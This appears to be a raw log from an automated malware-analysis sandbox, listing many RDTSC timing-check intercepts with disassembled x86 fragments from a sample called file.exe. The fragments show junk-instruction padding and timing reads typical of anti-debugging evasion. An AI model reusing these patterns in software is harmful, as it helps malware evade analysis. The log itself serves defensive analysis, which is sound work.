Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADFC01 second address: ADFC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: ADFC0A second address: ADFC0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE0A16 second address: AE0A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE0A1A second address: AE0A3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnl 00007FA934C8B333h 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007FA934C8B326h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE0A3D second address: AE0A60 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA9347D66B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FA9347D66C2h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE0A60 second address: AE0A64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE0A64 second address: AE0A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2C00E second address: A2C018 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA934C8B326h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE8876 second address: AE887D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE887D second address: AE8899 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA934C8B338h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE8899 second address: AE8902 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FA9347D66CDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f js 00007FA9347D66C7h 0x00000015 jmp 00007FA9347D66BFh 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c pushad 0x0000001d jmp 00007FA9347D66C3h 0x00000022 ja 00007FA9347D66B6h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b jmp 00007FA9347D66BBh 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE8902 second address: AE8906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE8A83 second address: AE8A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF358E second address: AF359D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA934C8B326h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF9FE1 second address: AF9FE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF9FE5 second address: AF9FE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF9FE9 second address: AF9FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA9347D66BBh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AF9FFA second address: AFA019 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA934C8B335h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0D51F second address: B0D542 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C0h 0x00000007 pushad 0x00000008 jmp 00007FA9347D66BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0BE3C second address: B0BE59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA934C8B326h 0x0000000a jng 00007FA934C8B326h 0x00000010 ja 00007FA934C8B326h 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0BFBF second address: B0BFEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C3h 0x00000007 push edi 0x00000008 jo 00007FA9347D66B6h 0x0000000e js 00007FA9347D66B6h 0x00000014 pop edi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jns 00007FA9347D66B6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0BFEF second address: B0BFFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA934C8B326h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C16F second address: B0C173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C173 second address: B0C179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C179 second address: B0C189 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA9347D66C2h 0x00000008 jc 00007FA9347D66B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C480 second address: B0C48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FA934C8B326h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C48F second address: B0C4B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007FA9347D66CBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C4B0 second address: B0C4CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B336h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C4CC second address: B0C4D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0C4D0 second address: B0C4D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B11819 second address: B1181E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1181E second address: B1182A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007FA934C8B326h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1182A second address: B1183E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FA9347D66B6h 0x0000000e jnc 00007FA9347D66B6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1183E second address: B1184A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1199A second address: B119A0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B119A0 second address: B119AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B14ADA second address: B14AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B14AE0 second address: B14AE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B14AE7 second address: B14B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA9347D66C5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B324FD second address: B32503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B34CDB second address: B34CE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B34CE1 second address: B34CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4E85E second address: B4E87A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA9347D66B6h 0x0000000a jmp 00007FA9347D66C2h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4E87A second address: B4E887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FA934C8B326h 0x00000009 push esi 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B4EA10 second address: B4EA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B50380 second address: B503D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007FA934C8B32Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 pushad 0x00000012 push esi 0x00000013 jmp 00007FA934C8B335h 0x00000018 jmp 00007FA934C8B334h 0x0000001d pop esi 0x0000001e jmp 00007FA934C8B32Bh 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 pop esi 0x00000027 jmp 00007FA934C8B32Dh 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B503D9 second address: B503DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B52F57 second address: B52F5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B53307 second address: B53348 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA9347D66BAh 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push ebx 0x0000000d jmp 00007FA9347D66BDh 0x00000012 pop ebx 0x00000013 nop 0x00000014 push edx 0x00000015 mov dword ptr [ebp+122D34A6h], edi 0x0000001b pop edx 0x0000001c push dword ptr [ebp+122D195Ah] 0x00000022 mov edx, ebx 0x00000024 push 7B3C172Fh 0x00000029 jc 00007FA9347D66C0h 0x0000002f pushad 0x00000030 push esi 0x00000031 pop esi 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B546BC second address: B546CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA934C8B326h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56505 second address: B56525 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA9347D66C3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pop edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B56525 second address: B5652D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B5652D second address: B5653A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FA9347D66B6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480191 second address: 54801D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B339h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FA934C8B32Ch 0x00000011 sbb ch, FFFFFFE8h 0x00000014 jmp 00007FA934C8B32Bh 0x00000019 popfd 0x0000001a movzx eax, di 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54801D7 second address: 54801DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54801DB second address: 54801DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54801DF second address: 54801E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54801E5 second address: 5480247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edx 0x00000005 movzx eax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dl, 4Ah 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 mov bx, cx 0x00000016 push ecx 0x00000017 pushfd 0x00000018 jmp 00007FA934C8B335h 0x0000001d sub al, 00000016h 0x00000020 jmp 00007FA934C8B331h 0x00000025 popfd 0x00000026 pop ecx 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA934C8B339h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5480247 second address: 548025C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 548025C second address: 5480262 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470056 second address: 547005A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 547005A second address: 5470060 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470060 second address: 5470071 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470071 second address: 5470075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5470075 second address: 54700A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FA9347D66BCh 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA9347D66C7h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54400C8 second address: 54400CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54400CE second address: 5440102 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b movzx ecx, dx 0x0000000e push edi 0x0000000f mov al, 45h 0x00000011 pop edi 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA9347D66C3h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440102 second address: 5440106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440106 second address: 544010C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 544010C second address: 5440154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FA934C8B332h 0x00000009 or cx, 1DF8h 0x0000000e jmp 00007FA934C8B32Bh 0x00000013 popfd 0x00000014 mov di, cx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FA934C8B332h 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5440154 second address: 5440171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54401CA second address: 54401CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54401CF second address: 54401F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA9347D66BAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54401F8 second address: 5440207 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B32Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460C82 second address: 5460C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460C87 second address: 5460CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA934C8B337h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460CA2 second address: 5460D21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FA9347D66C3h 0x00000015 xor eax, 5A6CAEAEh 0x0000001b jmp 00007FA9347D66C9h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FA9347D66C0h 0x00000027 jmp 00007FA9347D66C5h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460D21 second address: 5460D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460D27 second address: 5460D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460D2B second address: 5460D2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460D2F second address: 5460DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FA9347D66C4h 0x00000010 xor cx, F5B8h 0x00000015 jmp 00007FA9347D66BBh 0x0000001a popfd 0x0000001b pushad 0x0000001c call 00007FA9347D66C6h 0x00000021 pop esi 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 pushad 0x00000028 mov esi, edi 0x0000002a pushfd 0x0000002b jmp 00007FA9347D66C9h 0x00000030 sub ecx, 001321B6h 0x00000036 jmp 00007FA9347D66C1h 0x0000003b popfd 0x0000003c popad 0x0000003d mov ebp, esp 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460DBA second address: 5460DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460DBE second address: 5460DC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 54607D3 second address: 546086E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA934C8B331h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FA934C8B32Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007FA934C8B331h 0x00000016 call 00007FA934C8B330h 0x0000001b mov eax, 7BFBD8B1h 0x00000020 pop ecx 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FA934C8B333h 0x0000002a sub ch, 0000001Eh 0x0000002d jmp 00007FA934C8B339h 0x00000032 popfd 0x00000033 mov di, ax 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 pushad 0x0000003a mov dx, cx 0x0000003d mov al, 2Bh 0x0000003f popad 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FA934C8B32Ah 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546086E second address: 5460880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460880 second address: 5460884 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460738 second address: 5460748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA9347D66BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460748 second address: 546077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007FA934C8B336h 0x00000015 adc ch, FFFFFFD8h 0x00000018 jmp 00007FA934C8B32Bh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 546077E second address: 5460784 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460784 second address: 5460788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5460478 second address: 546049C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA9347D66C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ax, dx 0x0000000e mov eax, ebx 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 movsx ebx, ax 0x00000018 rdtsc
